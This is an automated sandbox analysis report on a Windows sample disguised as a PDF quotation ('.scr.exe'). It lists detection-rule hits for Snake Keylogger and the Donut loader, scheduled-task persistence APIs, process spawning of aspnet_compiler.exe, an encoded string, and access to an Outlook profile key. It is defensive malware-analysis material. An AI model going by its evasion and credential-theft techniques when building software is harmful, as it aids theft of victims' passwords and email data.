Source: 5.2.aspnet_compiler.exe.1ae100100e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.aspnet_compiler.exe.1ae100100e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.aspnet_compiler.exe.1ae100100e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.aspnet_compiler.exe.1ae100100e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 5.2.aspnet_compiler.exe.1ae6ada0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.aspnet_compiler.exe.1ae6ada0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.aspnet_compiler.exe.1ae6ada0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.aspnet_compiler.exe.1ae6ada0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a1d5c9648.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000005.00000002.2656855245.000001AE692A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000005.00000002.2658156720.000001AE6ADA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.2658156720.000001AE6ADA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2658156720.000001AE6ADA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000005.00000002.2658156720.000001AE6ADA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000005.00000002.2656248989.000001AE10009000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.2656248989.000001AE10009000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.1922304917.0000017A0D856000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.1930706424.0000017A1D5C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: Process Memory Space: aspnet_compiler.exe PID: 7848, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: aspnet_compiler.exe PID: 7848, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a1d5c9648.4.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a1d5c9648.4.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a1d5c9648.4.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a1d5c9648.4.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a26290000.10.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a26290000.10.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, -.cs

Base64 encoded string: 'jjJdFB838xlLBhY/vj9HDxR0nDhdBRc4sTIVJx8umCVaEgMbrjhLDRg2pHBJBQ4Fmz5CDDQ7sC4VDwoFlCVLEQ87sSJaGUE9uD9xLB80uj9GWz0/qR9XEB8cryRDKBs0uSdLWx0/qRRgARc/5gJABB8iki0VMh87uRhaEhM0unBvBB5hui5aPyo1riJaCRU05ixLFCUZqDlcBRQumSRDARM05hhLFD47qSoVUkhj6nkVIQkpuCZMDAMJuDlYBQhhjiJDEBY/nDhdBRc4sTJrGAo2sjlLEkE4vClLDAw35jhDDxE/qS5dFA=='

Source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a1d5c9648.4.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a26290000.10.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a26290000.10.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a26290000.10.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a1d5c9648.4.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a26290000.10.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a1d5c9648.4.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a1d5c9648.4.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a1d5c9648.4.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a26290000.10.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a26290000.10.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a1d5c9648.4.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/0@4/3

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7860:120:WilError_03

Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE002E1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2656248989.000001AE100B7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE0031E000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE0032B000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE002D1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE002EF000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	ReversingLabs: Detection: 13%
Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Virustotal: Detection: 27%

Source: unknown	Process created: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe "C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe"
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: uxtheme.dll	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe

Static file information: File size 1479168 > 1048576

Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x168800

Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1934310097.0000017A26290000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D5C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D92A000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922304917.0000017A0D9E4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1934310097.0000017A26290000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D5C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D92A000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922304917.0000017A0D9E4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D5C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D7B9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922078507.0000017A0BDC0000.00000004.08000000.00040000.00000000.sdmp
